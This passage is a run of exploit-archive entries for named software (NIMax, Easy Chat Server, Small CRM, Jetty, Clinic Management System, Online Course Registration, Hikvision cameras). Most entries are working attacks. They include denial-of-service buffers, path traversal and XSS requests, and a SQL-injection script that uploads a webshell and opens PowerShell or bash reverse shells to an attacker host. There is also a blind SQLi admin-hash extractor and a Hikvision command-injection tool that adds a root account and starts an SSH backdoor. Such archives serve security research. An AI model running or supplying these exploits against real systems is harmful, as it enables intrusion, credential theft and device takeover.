      '''[ POC ]
      1 - Copy printed "AAAAA..." string from "nimax.txt"
      2 - Open NIMax.exe
      3 - Right click "Remote systems" and press "Create New"
      4 - Select "Remote VISA System" and press "Next"
      5 - Paste clipboard in "Remote VISA System Address"
      6 - Press finish and DoS will occur
      '''

      buffer = "\x41" * 5000

      try:
          f = open("nimax.txt", "w")
          f.write(buffer)
          f.close()
          print("[+] File created!")
      except:
          print("[+] File could not be created!")
  19. # Exploit Title: NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC)
      # Date: 24/06/2021
      # Exploit Author: LinxzSec
      # Vulnerability: Local Denial of Service (DoS)
      # Vendor Homepage: https://www.ni.com/en-gb.html
      # Software Link: License Required - https://knowledge.ni.com/KnowledgeArticleDetails?id=kA03q000000YGQwCAO&l=en-GB
      # Tested Version: 5.3.1f0
      # Tested On: Windows 10 Pro x64

      '''[ POC ]
      1 - Copy printed "AAAAA..." string from "nimax.txt"
      2 - Open NIMax.exe
      3 - Drop down "My System" then drop down "Software"
      5 - Locate "NI-VISA 5.2" and select it
      6 - Open the "VISA Options" tab
      7 - Drop down "General settings"
      8 - Select "Aliases"
      9 - Select "Add alias"
      10 - Paste string from "nimax.txt" into "Resource name"
      11 - Just put a single character in the alias and press "ok", DoS will occur
      '''

      buffer = "\x41" * 5000

      try:
          f = open("nimax.txt", "w")
          f.write(buffer)
          f.close()
          print("[+] File created!")
      except:
          print("[+] File could not be created!")
20. # Exploit Title: Easy Chat Server 3.1 - Directory Traversal and Arbitrary File Read
# Date: 11 October 2021
# Exploit Author: z4nd3r
# Vendor Homepage: http://www.echatserver.com/
# Software Link: http://www.echatserver.com/
# Version: 3.1
# Tested on: Windows 10 Pro Build 19042, English
#
# Description:
# The web server allows for directory traversal and reading of arbitrary files on the
# system, given that the account running the server can access the target file.

Proof-of-concept using Burp:

Request:

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 192.168.50.52
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

----------------------------------------

Response:

HTTP/1.0 200 OK
Date: Thu, 21 Oct 2021 14:55:57 GMT
Server: Easy Chat Server/1.0
Accept-Ranges: bytes
Content-Length: 92
Connection: close
Content-Type: text/html

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
21. # Exploit Title: Small CRM 3.0 - 'description' Stored Cross-Site Scripting (XSS)
# Date: 20/10/2021
# Exploit Author: Ghuliev
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/small-crm-php/
# Version: 3.0
# Tested on: Server: Ubuntu

When a user or admin creates a ticket, we can inject javascript code into ticket.

POST /crm/create-ticket.php HTTP/1.1
Host: IP
Content-Length: 79
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://IP
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://IP/crm/create-ticket.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,az;q=0.8,ru;q=0.7

subject=aa&tasktype=Select+your+Task+Type&priority=&description=</textarea><script>alert(1)</script>&send=Send
22. # Exploit Title: Jetty 9.4.37.v20210219 - Information Disclosure
# Date: 2021-10-21
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.eclipse.org/jetty/
# Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/9.4.37.v20210219/
# Version: 9.4.37.v20210219 and 9.4.38.v20210224
# Tested on: Kali Linux
# CVE : CVE-2021-28164

POC #1 - web.xml

GET /%2e/WEB-INF/web.xml HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
23. # Exploit Title: Clinic Management System 1.0 - SQL injection to Remote Code Execution
# Date: 21/10/2021
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip
# Version: 1.0
# Tested on: Windows 7 and Ubuntu 21.10
# References: https://medium.com/@Pablo0xSantiago/clinic-management-system-1-0-sql-injection-bypass-to-remote-code-execution-804bceac037e
# Vulnerability: Through SQL injection to bypass the login form it is
# possible to upload a malicious file and after use that malicious file to
# execute code in the remote system.

# Proof of Concept:

import requests
import sys
import time

session = requests.Session()

#http_proxy = "http://127.0.0.1:8080"
#https_proxy = "https://127.0.0.1:8080"
#proxyDict = {"http" : http_proxy,
#             "https" : https_proxy}

def windows(HPW,host,shell_name):
    payload = """powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""""
    host2 = host+'/'+'uploadImage/Logo/' + shell_name + '.php?cmd='+payload
    #print(payload)
    try:
        request_rce = requests.get(host2,timeout=8)
    except requests.exceptions.ReadTimeout:
        pass

def linux(HPL,host,shell_name):
    payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+HPL+'+0>%261"'
    host2 = host+'/'+'/uploadImage/Logo/' + shell_name + '.php?cmd='+payload
    #print(payload)
    try:
        request_rce = requests.get(host2,timeout=8)
    except requests.exceptions.ReadTimeout:
        pass

def main():
    host = sys.argv[1]
    shell_name = sys.argv[2]
    url = host + '/login.php'
    values = {'user': "admin",
              'email': "' OR 1 -- -",
              'password': '',
              'btn_login': "" }
    r = session.post(url, data=values)
    cookie = session.cookies.get_dict()['PHPSESSID']
    data = { 'btn_web':''}
    headers= {'Cookie': 'PHPSESSID='+cookie}
    request = session.post(host+ '/manage_website.php', data=data, headers=headers,files={"website_image":(shell_name+'.php',"<?=`$_GET[cmd]`?>")})
    print("")
    print('[*] Your Simple Webshell was uploaded to ' + host + '/uploadImage/Logo/' + shell_name + '.php' )
    print("")
    LHOST = input('[+] Enter your LHOST: ')
    LPORT = input('[+] Enter your LPORT: ')
    print("")
    HPW= "'"+LHOST+"'"+','+LPORT
    HPL= ""+LHOST+""+'/'+LPORT
    print('[+] Option 1: Windows')
    print('[+] Option 2: Linux')
    option = input('[+] Choose OS: ')
    if option == "1":
        windows(HPW,host,shell_name)
        exit()
    elif option == "2":
        linux(HPL,host,shell_name)
        exit()
    else:
        print("Please choose Windows or Linux")

main()

#Usage: python3 host shell_name
#Example: python3 http://localhost/clinic shell
24. # Exploit Title: Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated)
# Exploit Author: Sam Ferguson (@AffineSecurity) and Drew Jones (@qhum7sec)
# Date: 2021-10-21
# Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
# Version: 1.0
# Tested On: Windows 10 + XAMPP + Python 3
# Vulnerability: An attacker can perform a blind boolean-based SQL injection attack, which can provide attackers
# with access to the username and md5 hash of any administrators.
# Vulnerable file: /online-course-registration/Online/pincode-verification.php

# Proof of Concept:

#!/usr/bin/python3

import requests
import sys
import string

def exploit(hostname, username, password):
    # Building bruteforce list
    pass_list = list(string.ascii_lowercase)
    pass_list += list(range(0,10))
    pass_list = map(str, pass_list)
    pass_list = list(pass_list)
    user_list = pass_list
    user_list += list(string.ascii_uppercase)
    user_list = map(str, user_list)
    user_list = list(user_list)

    session = requests.Session()

    # This URL may change based on the implementation - change as needed
    url = f"{hostname}/online-course-registration/Online/index.php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
               "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
               "Accept-Encoding": "gzip, deflate",
               "Content-Type": "application/x-www-form-urlencoded",
               "Origin": "http://127.0.0.1",
               "Connection": "close",
               "Referer": "http://127.0.0.1/online-course-registration/Online/index.php",
               "Upgrade-Insecure-Requests": "1",
               "Sec-Fetch-Dest": "document",
               "Sec-Fetch-Mode": "navigate",
               "Sec-Fetch-Site": "same-origin",
               "Sec-Fetch-User": "?1"}
    data = {"regno": f"{username}", "password": f"{password}", "submit": ''}
    r = session.post(url, headers=headers, data=data)

    print("Admin username:")
    # This range number is pretty arbitrary, so change it to whatever you feel like
    for i in range(1,33):
        counter = 0
        find = False
        for j in user_list:
            # This URL may change based on the implementation - change as needed
            url = f"{hostname}/online-course-registration/Online/pincode-verification.php"
            headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0",
                       "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
                       "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
                       "Accept-Encoding": "gzip, deflate",
                       "Content-Type": "application/x-www-form-urlencoded",
                       "Origin": "http://127.0.0.1",
                       "Connection": "close",
                       "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php",
                       "Upgrade-Insecure-Requests": "1",
                       "Sec-Fetch-Dest": "document",
                       "Sec-Fetch-Mode": "navigate",
                       "Sec-Fetch-Site": "same-origin",
                       "Sec-Fetch-User": "?1"}
            data = {"pincode": f"' or (select(select (substring(username,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''}
            a = session.post(url, headers=headers, data=data)
            counter += 1
            if 'Course Enroll' in a.text:
                sys.stdout.write(j)
                sys.stdout.flush()
                break
            elif counter == len(user_list):
                find = True
                break
        if find:
            break

    print("\n")
    print("Admin password hash:")
    # This range is not arbitrary and will cover md5 hashing - if the hashing implementation is different, change as needed
    for i in range(1,33):
        counter = 0
        find = False
        for j in pass_list:
            url = f"{hostname}/online-course-registration/Online/pincode-verification.php"
            headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0",
                       "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
                       "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
                       "Accept-Encoding": "gzip, deflate",
                       "Content-Type": "application/x-www-form-urlencoded",
                       "Origin": "http://127.0.0.1",
                       "Connection": "close",
                       "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php",
                       "Upgrade-Insecure-Requests": "1",
                       "Sec-Fetch-Dest": "document",
                       "Sec-Fetch-Mode": "navigate",
                       "Sec-Fetch-Site": "same-origin",
                       "Sec-Fetch-User": "?1"}
            data = {"pincode": f"' or (select(select (substring(password,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''}
            a = session.post(url, headers=headers, data=data)
            counter += 1
            if 'Course Enroll' in a.text:
                sys.stdout.write(j)
                sys.stdout.flush()
                break
            elif counter == len(pass_list):
                find = True
                break
        if find:
            break

    print("\n\nSuccessfully pwnd :)")

def logo():
    art = R'''
__/\\\\\\\\\\\\\____/\\\\\\\\\\\__/\\\\\_____/\\\__/\\\\_________/\\\__
_\/\\\/////////\\\_\/////\\\///__\/\\\\\\___\/\\\_\///\\________\/\\\__
_\/\\\_______\/\\\_____\/\\\_____\/\\\/\\\__\/\\\__/\\/_________\/\\\__
_\/\\\\\\\\\\\\\/______\/\\\_____\/\\\//\\\_\/\\\_\//___________\/\\\__
_\/\\\/////////________\/\\\_____\/\\\\//\\\\/\\\__________/\\\\\\\\\__
_\/\\\_________________\/\\\_____\/\\\_\//\\\/\\\_________/\\\////\\\__
_\/\\\_________________\/\\\_____\/\\\__\//\\\\\\________\/\\\__\/\\\__
_\/\\\______________/\\\\\\\\\\\_\/\\\___\//\\\\\________\//\\\\\\\/\\_
_\///______________\///////////__\///_____\/////__________\///////\//__
'''
    info = 'CVE-2021-37357 PoC'.center(76)
    credits = 'Created by @AffineSecurity and @qhum7sec'.center(76)
    print(f"{art}\n{info}\n{credits}")

def main():
    logo()
    # Check the argument count before indexing sys.argv, otherwise a missing
    # argument raises IndexError before the usage message is ever printed
    if len(sys.argv) != 4:
        print("Usage: python3 exploit.py http://127.0.0.1:80 username password")
        sys.exit(1)
    hostname = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    exploit(hostname, username, password)

if __name__ == '__main__':
    main()
25. # Exploit Title: Hikvision Web Server Build 210702 - Command Injection
# Exploit Author: bashis
# Vendor Homepage: https://www.hikvision.com/
# Version: 1.0
# CVE: CVE-2021-36260
# Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
# All credit to Watchful_IP

#!/usr/bin/env python3

"""
Note:

1) This code will _not_ verify if remote is Hikvision device or not.

2) Most of my interest in this code has been concentrated on how to reliably detect vulnerable and/or exploitable devices.
   Some devices are easy to detect, verify and exploit the vulnerability, other devices may be vulnerable but not so easy to verify and exploit.
   I think the combined verification code should have very high accuracy.

3) 'safe check' (--check) will try write and read for verification
   'unsafe check' (--reboot) will try reboot the device for verification

[Examples]

Safe vulnerability/verify check:
$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check

Safe and unsafe vulnerability/verify check: (will only use 'unsafe check' if not verified with 'safe check')
$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot

Unsafe vulnerability/verify check:
$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot

Launch and connect to SSH shell:
$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell

Execute command:
$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"

Execute blind command:
$./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"

$./CVE-2021-36260.py -h
[*] Hikvision CVE-2021-36260
[*] PoC by bashis <mcw noemail eu> (2021)
usage: CVE-2021-36260.py [-h] --rhost RHOST [--rport RPORT] [--check] [--reboot] [--shell] [--cmd CMD] [--cmd_blind CMD_BLIND] [--noverify] [--proto {http,https}]

optional arguments:
  -h, --help            show this help message and exit
  --rhost RHOST         Remote Target Address (IP/FQDN)
  --rport RPORT         Remote Target Port
  --check               Check if vulnerable
  --reboot              Reboot if vulnerable
  --shell               Launch SSH shell
  --cmd CMD             execute cmd (i.e: "ls -l")
  --cmd_blind CMD_BLIND execute blind cmd (i.e: "reboot")
  --noverify            Do not verify if vulnerable
  --proto {http,https}  Protocol used
$
"""

import os
import argparse
import time
import requests
from requests import packages
from requests.packages import urllib3
from requests.packages.urllib3 import exceptions


class Http(object):
    def __init__(self, rhost, rport, proto, timeout=60):
        super(Http, self).__init__()
        self.rhost = rhost
        self.rport = rport
        self.proto = proto
        self.timeout = timeout
        self.remote = None
        self.uri = None

        """ Most devices will use self-signed certificates, suppress any warnings """
        requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

        self.remote = requests.Session()
        self._init_uri()

        self.remote.headers.update({
            'Host': f'{self.rhost}:{self.rport}',
            'Accept': '*/*',
            'X-Requested-With': 'XMLHttpRequest',
            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'en-US,en;q=0.9,sv;q=0.8',
        })

        """
        self.remote.proxies.update({
            # 'http': 'http://127.0.0.1:8080',
        })
        """

    def send(self, url=None, query_args=None, timeout=5):

        if query_args:
            """Some devices can handle more, others less, 22 bytes seems like a good compromise"""
            if len(query_args) > 22:
                print(f'[!] Error: Command "{query_args}" to long ({len(query_args)})')
                return None

        """This weird code will try automatically switch between http/https and update Host """
        try:
            if url and not query_args:
                return self.get(url, timeout)
            else:
                data = self.put('/SDK/webLanguage', query_args, timeout)
        except requests.exceptions.ConnectionError:
            self.proto = 'https' if self.proto == 'http' else 'https'
            self._init_uri()
            try:
                if url and not query_args:
                    return self.get(url, timeout)
                else:
                    data = self.put('/SDK/webLanguage', query_args, timeout)
            except requests.exceptions.ConnectionError:
                return None
        except requests.exceptions.RequestException:
            return None
        except KeyboardInterrupt:
            return None

        """302 when requesting http on https enabled device"""
        if data.status_code == 302:
            redirect = data.headers.get('Location')
            self.uri = redirect[:redirect.rfind('/')]
            self._update_host()
            if url and not query_args:
                return self.get(url, timeout)
            else:
                data = self.put('/SDK/webLanguage', query_args, timeout)

        return data

    def _update_host(self):
        if not self.remote.headers.get('Host') == self.uri[self.uri.rfind('://') + 3:]:
            self.remote.headers.update({
                'Host': self.uri[self.uri.rfind('://') + 3:],
            })

    def _init_uri(self):
        self.uri = '{proto}://{rhost}:{rport}'.format(proto=self.proto, rhost=self.rhost, rport=str(self.rport))

    def put(self, url, query_args, timeout):
        """Command injection in the <language> tag"""
        query_args = '<?xml version="1.0" encoding="UTF-8"?>' \
                     f'<language>$({query_args})</language>'
        return self.remote.put(self.uri + url, data=query_args, verify=False, allow_redirects=False, timeout=timeout)

    def get(self, url, timeout):
        return self.remote.get(self.uri + url, verify=False, allow_redirects=False, timeout=timeout)


def check(remote, args):
    """
    status_code == 200 (OK); Verified vulnerable and exploitable
    status_code == 500 (Internal Server Error); Device may be vulnerable, but most likely not
    The SDK webLanguage tag is there, but generate status_code 500 when language not found
    I.e. Exist: <language>en</language> (200), not exist: <language>EN</language> (500)
    (Issue: Could also be other directory than 'webLib', r/o FS etc...)
    status_code == 401 (Unauthorized); Defiantly not vulnerable
    """
    if args.noverify:
        print(f'[*] Not verifying remote "{args.rhost}:{args.rport}"')
        return True

    print(f'[*] Checking remote "{args.rhost}:{args.rport}"')

    data = remote.send(url='/', query_args=None)
    if data is None:
        print(f'[-] Cannot establish connection to "{args.rhost}:{args.rport}"')
        return None

    print('[i] ETag:', data.headers.get('ETag'))

    data = remote.send(query_args='>webLib/c')
    if data is None or data.status_code == 404:
        print(f'[-] "{args.rhost}:{args.rport}" do not looks like Hikvision')
        return False

    status_code = data.status_code

    data = remote.send(url='/c', query_args=None)
    if not data.status_code == 200:
        """We could not verify command injection"""
        if status_code == 500:
            print(f'[-] Could not verify if vulnerable (Code: {status_code})')
            if args.reboot:
                return check_reboot(remote, args)
        else:
            print(f'[+] Remote is not vulnerable (Code: {status_code})')
        return False

    print('[!] Remote is verified exploitable')
    return True


def check_reboot(remote, args):
    """
    We sending 'reboot', wait 2 sec, then checking with GET request.
    - if there is data returned, we can assume remote is not vulnerable.
    - If there is no connection or data returned, we can assume remote is vulnerable.
    """
    if args.check:
        print('[i] Checking if vulnerable with "reboot"')
    else:
        print(f'[*] Checking remote "{args.rhost}:{args.rport}" with "reboot"')

    remote.send(query_args='reboot')
    time.sleep(2)

    if not remote.send(url='/', query_args=None):
        print('[!] Remote is vulnerable')
        return True
    else:
        print('[+] Remote is not vulnerable')
        return False


def cmd(remote, args):
    if not check(remote, args):
        return False

    data = remote.send(query_args=f'{args.cmd}>webLib/x')
    if data is None:
        return False

    data = remote.send(url='/x', query_args=None)
    if data is None or not data.status_code == 200:
        print(f'[!] Error execute cmd "{args.cmd}"')
        return False

    print(data.text)
    return True


def cmd_blind(remote, args):
    """ Blind command injection """
    if not check(remote, args):
        return False

    data = remote.send(query_args=f'{args.cmd_blind}')
    if data is None or not data.status_code == 500:
        print(f'[-] Error execute cmd "{args.cmd_blind}"')
        return False

    print(f'[i] Try execute blind cmd "{args.cmd_blind}"')
    return True


def shell(remote, args):
    if not check(remote, args):
        return False

    data = remote.send(url='/N', query_args=None)
    if data.status_code == 404:
        print(f'[i] Remote "{args.rhost}" not pwned, pwning now!')
        data = remote.send(query_args='echo -n P::0:0:W>N')
        if data.status_code == 401:
            print(data.headers)
            print(data.text)
            return False
        remote.send(query_args='echo :/:/bin/sh>>N')
        remote.send(query_args='cat N>>/etc/passwd')
        remote.send(query_args='dropbear -R -B -p 1337')
        remote.send(query_args='cat N>webLib/N')
    else:
        print(f'[i] Remote "{args.rhost}" already pwned')

    print(f'[*] Trying SSH to {args.rhost} on port 1337')
    os.system(f'stty echo; stty iexten; stty icanon; \
        ssh -o StrictHostKeyChecking=no -o LogLevel=error -o UserKnownHostsFile=/dev/null \
        P@{args.rhost} -p 1337')


def main():
    print('[*] Hikvision CVE-2021-36260\n[*] PoC by bashis <mcw noemail eu> (2021)')

    parser = argparse.ArgumentParser()
    parser.add_argument('--rhost', required=True, type=str, default=None, help='Remote Target Address (IP/FQDN)')
    parser.add_argument('--rport', required=False, type=int, default=80, help='Remote Target Port')
    parser.add_argument('--check', required=False, default=False, action='store_true', help='Check if vulnerable')
    parser.add_argument('--reboot', required=False, default=False, action='store_true', help='Reboot if vulnerable')
    parser.add_argument('--shell', required=False, default=False, action='store_true', help='Launch SSH shell')
    parser.add_argument('--cmd', required=False, type=str, default=None, help='execute cmd (i.e: "ls -l")')
    parser.add_argument('--cmd_blind', required=False, type=str, default=None, help='execute blind cmd (i.e: "reboot")')
    parser.add_argument(
        '--noverify', required=False, default=False, action='store_true', help='Do not verify if vulnerable'
    )
    parser.add_argument(
        '--proto', required=False, type=str, choices=['http', 'https'], default='http', help='Protocol used'
    )
    args = parser.parse_args()

    remote = Http(args.rhost, args.rport, args.proto)

    try:
        if args.shell:
            shell(remote, args)
        elif args.cmd:
            cmd(remote, args)
        elif args.cmd_blind:
            cmd_blind(remote, args)
        elif args.check:
            check(remote, args)
        elif args.reboot:
            check_reboot(remote, args)
        else:
            parser.parse_args(['-h'])
    except KeyboardInterrupt:
        return False


if __name__ == '__main__':
    main()